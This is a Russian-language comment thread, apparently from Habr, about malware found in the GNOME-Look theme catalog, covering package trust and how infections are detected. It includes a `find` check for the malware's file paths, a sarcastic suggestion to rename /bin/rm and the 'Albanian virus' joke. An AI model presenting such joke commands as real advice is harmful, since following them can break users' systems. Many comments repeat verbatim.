Я обычно перед такими командами выполняю mv /bin/rm /bin/rm.old
Потому что все ставить надо с официальных репозиториев. Или из _просмотренных_ исходников.
И не надо гнать на линукс.
И не надо гнать на линукс.
SELinux/AppArmor решает. вопрос много ли осилило правильно настроить сиё на рабочей станции, многие и на серверах забивают.
Операция удаления файлов, написанных в новостях, выполненная от рута, также является потенциально опасной.
Для начала можно просто проверить, есть ли эти файлы.
$ find /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh ~/index.php ~/run.bash
Для начала можно просто проверить, есть ли эти файлы.
$ find /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh ~/index.php ~/run.bash
нет у юзеров права на запись в /usr/bin и /etc
либо используется sudo без пароля для установки вредоносного кода
либо используется sudo без пароля для установки вредоносного кода
Во-первых, никто не поделится информацией, сколько времени прошло между выкладыванием заражённого пакета и обнаружением собственно факта его заражённости? Известен случай, когда в репозитории был выложен — проверки ради — код чего-то там с вредоносной вставкой. Практика тогда показала, что код прожил ровно 20 минут, после чего был обнаружен и активисты подняли хай на весь интернет. Здесь, вполне очевидно, то же самое и посему мне интересно — каков интервал между диверсией и разоблачением.
Во-вторых, в комментариях нет мнения представителей GNOME в любом их виде, каковых, я уверен, есть на Хабре. Не хотят они нам ничего сообщить по существу?
В-третьих… С одной стороны, пользователь сам должен скачать и установить пакет — никаким другим способом этот зловред не распространяется. С другой стороны, каталог GNOME-Look всё же — не варезная помойка неизвестного происхождения и имеет (или уже надо говорить «имел»?) репутацию среди гномоводоведов, каковые и в самом деле предпочтут качать красивости оттуда, нежели откуда-то ещё. Возникает вопрос — если зловред попал на такой солидный портал, то какова гарантия, что этот зловред или его единокровные собратья не попадут или уже не попали в официальные репозитории? К примеру, в те самые официальные репозитории, из которых подкармливается обновлениями моя Мандрива…
Видимо, просвещённому сообществу пришла пора несколько пересмотреть свои взгляды на linux…
Во-вторых, в комментариях нет мнения представителей GNOME в любом их виде, каковых, я уверен, есть на Хабре. Не хотят они нам ничего сообщить по существу?
В-третьих… С одной стороны, пользователь сам должен скачать и установить пакет — никаким другим способом этот зловред не распространяется. С другой стороны, каталог GNOME-Look всё же — не варезная помойка неизвестного происхождения и имеет (или уже надо говорить «имел»?) репутацию среди гномоводоведов, каковые и в самом деле предпочтут качать красивости оттуда, нежели откуда-то ещё. Возникает вопрос — если зловред попал на такой солидный портал, то какова гарантия, что этот зловред или его единокровные собратья не попадут или уже не попали в официальные репозитории? К примеру, в те самые официальные репозитории, из которых подкармливается обновлениями моя Мандрива…
Видимо, просвещённому сообществу пришла пора несколько пересмотреть свои взгляды на linux…
>нет мнения представителей GNOME
А при чем тут GNOME вообще, этот сайт никакого отношения к GNOME Foundation и его участникам отношения не имеет, M$ же вам не отчитывается за каждый вирус работающей в их среде, коих сотни тысяч :) Можете рассматривать этот ресурс как файлопомойку с аттрибутикой GNOME, которую наполняют юзеры. Насколько пользователь доверяет выложенному там контенту только говорит о его уровне развития.
А при чем тут GNOME вообще, этот сайт никакого отношения к GNOME Foundation и его участникам отношения не имеет, M$ же вам не отчитывается за каждый вирус работающей в их среде, коих сотни тысяч :) Можете рассматривать этот ресурс как файлопомойку с аттрибутикой GNOME, которую наполняют юзеры. Насколько пользователь доверяет выложенному там контенту только говорит о его уровне развития.
>Возникает вопрос — если зловред попал на такой солидный портал, то какова гарантия, что этот зловред или его единокровные собратья не попадут или уже не попали в официальные репозитории?
Совершенно левый пакет автор которого неизвестен, не имеющий официальной странички, ни ссылки на скачку исходников (да, иконки и темы тоже распространяются с «исходниками»), а только бинарный deb уже вызывает подозрение. О его попадании в дистрибутивы даже можно и не говорить.
Совершенно левый пакет автор которого неизвестен, не имеющий официальной странички, ни ссылки на скачку исходников (да, иконки и темы тоже распространяются с «исходниками»), а только бинарный deb уже вызывает подозрение. О его попадании в дистрибутивы даже можно и не говорить.
Здравствуйте, All!
Я — Албанский вирус, но в связи с очень плохим развитием технологии в моей стране, я, к сожалению, не могу причинить вред вашему компьютеру. Пажалуйста, будте так любезны, сотрите один из важных файлов с вашего компьютера самостоятельно и перешлите меня другим.
Зарание благодарен за понимание и сотрудничество.
Я — Албанский вирус, но в связи с очень плохим развитием технологии в моей стране, я, к сожалению, не могу причинить вред вашему компьютеру. Пажалуйста, будте так любезны, сотрите один из важных файлов с вашего компьютера самостоятельно и перешлите меня другим.
Зарание благодарен за понимание и сотрудничество.
Sign up to leave a comment.
В каталоге GNOME-Look зафиксировано наличие вредоносного ПО